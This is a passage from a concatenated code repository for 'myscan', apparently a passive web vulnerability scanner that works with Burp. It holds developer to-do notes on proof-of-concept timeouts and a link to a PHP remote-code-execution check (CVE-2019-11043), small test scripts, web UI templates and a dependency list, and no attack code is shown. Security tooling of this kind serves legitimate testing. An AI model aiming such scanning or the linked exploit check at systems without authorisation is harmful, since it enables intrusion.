右键检测优化,支持去重。ok 8 | 9.poc 超时 ok 9 | 10.sql error 误报 多进程处理,无法修改 10 | 12。全局变量超时,考虑????notok ,sql注入需要特定时间。 11 | 12 | 13.phpstudy 目录问题 13 | 14.php CVE-2019-11043 https://github.com/jas502n/CVE-2019-11043/blob/master/php-rce-check.py 14 | 15. -------------------------------------------------------------------------------- /myscan/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/10/29 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | 6 | ''' 7 | 8 | you can ignore this folder 9 | ''' -------------------------------------------------------------------------------- /myscan/tests/codetest.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/tests/codetest.py -------------------------------------------------------------------------------- /myscan/tests/es_test.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/1 3 | # @Author : caicai 4 | # @File : es_test.py 5 | 6 | from elasticsearch_dsl import Search 7 | from elasticsearch_dsl.connections import connections 8 | from elasticsearch import helpers 9 | 10 | client = connections.create_connection(hosts=['127.0.0.1:9200'], 11 | http_auth=('',''), timeout=10) 12 | info=client.info() 13 | if "You Know, for Search" in str(info): 14 | if int(info.get("version").get("number").replace(".",""))>700: 15 | action = { 16 | "_index": "burpdata", 17 | "_id": "111111", 18 | "_source": {"a":1} 19 | } 20 | client.indices.exists("httpinfo") 21 | helpers.bulk(client, [action]) 22 | -------------------------------------------------------------------------------- /myscan/tests/getdatafromredis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-09 3 | # @Author : caicai 4 | # @File : getdatafromredis.py 5 | 6 | import redis, json 7 | r = redis.Redis(db=0) 8 | res = r.lpop("burpdata") 9 | if res: 10 | print(json.dumps(json.loads(res),indent=3)) 11 | -------------------------------------------------------------------------------- /myscan/tests/ignore_test.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/19 3 | # @Author : caicai 4 | # @File : ignore_test.py 5 | import socket 6 | import urllib3 7 | import requests 8 | 9 | USE_IPV6 = True 10 | 11 | 12 | def allowed_gai_family(): 13 | family = socket.AF_INET 14 | if USE_IPV6: 15 | family = socket.AF_UNSPEC 16 | return family 17 | 18 | 19 | urllib3.util.connection.allowed_gai_family = allowed_gai_family 20 | 21 | r=requests.get("http://www.qq.com/",proxies={"http":"http://127.0.0.1:8080"},allow_redirects=True) 22 | print(r.status_code) 23 | -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/js/npm.js: -------------------------------------------------------------------------------- 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment. 2 | require('../../js/transition.js') 3 | require('../../js/alert.js') 4 | require('../../js/button.js') 5 | require('../../js/carousel.js') 6 | require('../../js/collapse.js') 7 | require('../../js/dropdown.js') 8 | require('../../js/modal.js') 9 | require('../../js/tooltip.js') 10 | require('../../js/popover.js') 11 | require('../../js/scrollspy.js') 12 | require('../../js/tab.js') 13 | require('../../js/affix.js') -------------------------------------------------------------------------------- /myscan/web/static/css/prism.min.css: -------------------------------------------------------------------------------- 1 | code[class*="language-"],pre[class*="language-"]{color:black;text-shadow:0 1px white;font-family:Consolas,Monaco,'Andale Mono',monospace;direction:ltr;text-align:left;white-space:pre;word-spacing:normal;word-break:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}pre[class*="language-"]::-moz-selection,pre[class*="language-"] ::-moz-selection,code[class*="language-"]::-moz-selection,code[class*="language-"] ::-moz-selection{text-shadow:none;background:#b3d4fc}pre[class*="language-"]::selection,pre[class*="language-"] ::selection,code[class*="language-"]::selection,code[class*="language-"] ::selection{text-shadow:none;background:#b3d4fc}@media print{code[class*="language-"],pre[class*="language-"]{text-shadow:none}}pre[class*="language-"]{padding:1em;margin:.5em 0;overflow:auto}:not(pre)>code[class*="language-"],pre[class*="language-"]{background:#f5f2f0}:not(pre)>code[class*="language-"]{padding:.1em;border-radius:.3em}.token.comment,.token.prolog,.token.doctype,.token.cdata{color:slategray}.token.punctuation{color:#999}.namespace{opacity:.7}.token.property,.token.tag,.token.boolean,.token.number,.token.constant,.token.symbol,.token.deleted{color:#905}.token.selector,.token.attr-name,.token.string,.token.char,.token.builtin,.token.inserted{color:#690}.token.operator,.token.entity,.token.url,.language-css .token.string,.style .token.string{color:#a67f59;background:hsla(0,0,100%,.5)}.token.atrule,.token.attr-value,.token.keyword{color:#07a}.token.function{color:#dd4a68}.token.regex,.token.important,.token.variable{color:#e90}.token.important,.token.bold{font-weight:bold}.token.italic{font-style:italic}.token.entity{cursor:help} -------------------------------------------------------------------------------- /myscan/web/static/js/prism-http.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.http={"request-line":{pattern:/^(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b\shttps?:\/\/\S+\sHTTP\/[0-9.]+/,inside:{property:/^\b(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b/,"attr-name":/:\w+/}},"response-status":{pattern:/^HTTP\/1.[01] [0-9]+.*/,inside:{property:/[0-9]+[A-Z\s-]+$/i}},keyword:/^[\w-]+:(?=.+)/m};var httpLanguages={"application/json":Prism.languages.javascript,"application/xml":Prism.languages.markup,"text/xml":Prism.languages.markup,"text/html":Prism.languages.markup};for(var contentType in httpLanguages)if(httpLanguages[contentType]){var options={};options[contentType]={pattern:new RegExp("(content-type:\\s*"+contentType+"[\\w\\W]*?)\\n\\n[\\w\\W]*","i"),lookbehind:!0,inside:{rest:httpLanguages[contentType]}},Prism.languages.insertBefore("http","keyword",options)} -------------------------------------------------------------------------------- /myscan/web/static/js/prism-javascript.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|false|finally|for|function|get|if|implements|import|in|instanceof|interface|let|new|null|package|private|protected|public|return|set|static|super|switch|this|throw|true|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|-?Infinity)\b/,"function":/(?!\d)[a-z0-9_$]+(?=\()/i}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^/])\/(?!\/)(\[.+?]|\\.|[^/\r\n])+\/[gim]{0,3}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/[\w\W]*?<\/script>/i,inside:{tag:{pattern:/|<\/script>/i,inside:Prism.languages.markup.tag.inside},rest:Prism.languages.javascript},alias:"language-javascript"}}); -------------------------------------------------------------------------------- /myscan/web/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | {{title}} 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 35 | 36 |
37 | {% block content %}{% endblock %} 38 | 39 |
40 |
41 |
42 |
    43 |
  • Myscan被动扫描器
    • 44 |
45 |
46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /myscan/web/templates/error.html: -------------------------------------------------------------------------------- 1 | 2 |

3 | no result 4 |

5 | 6 | -------------------------------------------------------------------------------- /myscan/web/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block content %} 3 | 4 |
5 |
6 |
7 |

Myscan被动扫描结果 漏洞总数:{{total_counts}}条

8 |
9 |
10 | 11 | 12 | 13 | 14 | 15 |
16 |
17 | 18 |
19 |
20 |
21 |
22 | 23 |
24 |
25 | 26 | {% endblock %} 27 | -------------------------------------------------------------------------------- /myscan_burp_extension.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan_burp_extension.jar -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pyjnius 2 | requests 3 | incremental 4 | requests-toolbelt 5 | redis 6 | flask 7 | six 8 | dnspython 9 | ldaptor 10 | pyCrypto 11 | pysmb 12 | pymongo 13 | python-nmap 14 | paramiko 15 | pymysql 16 | elasticsearch-dsl>=7.0.0,<8.0.0 17 | elasticsearch 18 | mmh3 19 | cryptography 20 | bs4 21 | pyDes --------------------------------------------------------------------------------